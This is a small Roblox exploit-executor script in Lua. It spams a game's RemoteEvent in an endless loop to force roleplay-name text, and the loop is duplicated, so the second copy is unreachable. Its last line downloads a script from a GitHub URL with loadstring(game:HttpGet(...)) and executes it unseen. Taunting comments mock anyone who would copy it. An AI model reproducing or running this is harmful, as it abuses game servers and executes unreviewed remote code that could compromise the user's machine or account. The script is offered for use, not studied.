local args = {
    [1] = "RolePlay",
    [2] = "LOL You Can't Steal Bruh"
}
while true do
    game:GetService("ReplicatedStorage").RE:FindFirstChild("1RPNam1eTex1t"):FireServer(unpack(args))
    wait()
end
wait(2.0)
local args = {
    [1] = "RolePlay",
    [2] = "LOL You Can't Steal Bruh"
}
while true do
    game:GetService("ReplicatedStorage").RE:FindFirstChild("1RPNam1eTex1t"):FireServer(unpack(args))
    wait()
end
  -- This Script Is Private
  -- -------------------------------------------------------------------
  -- Bro What Do You Want ( Steal ) ?
  -- Bruh You Can't Steal Cry About This
loadstring(game:HttpGet("https://raw.githubusercontent.com/MS7top/MS7/refs/heads/main/MS7v0.5.txt"))()
  -- Always The Best MS7 🥈
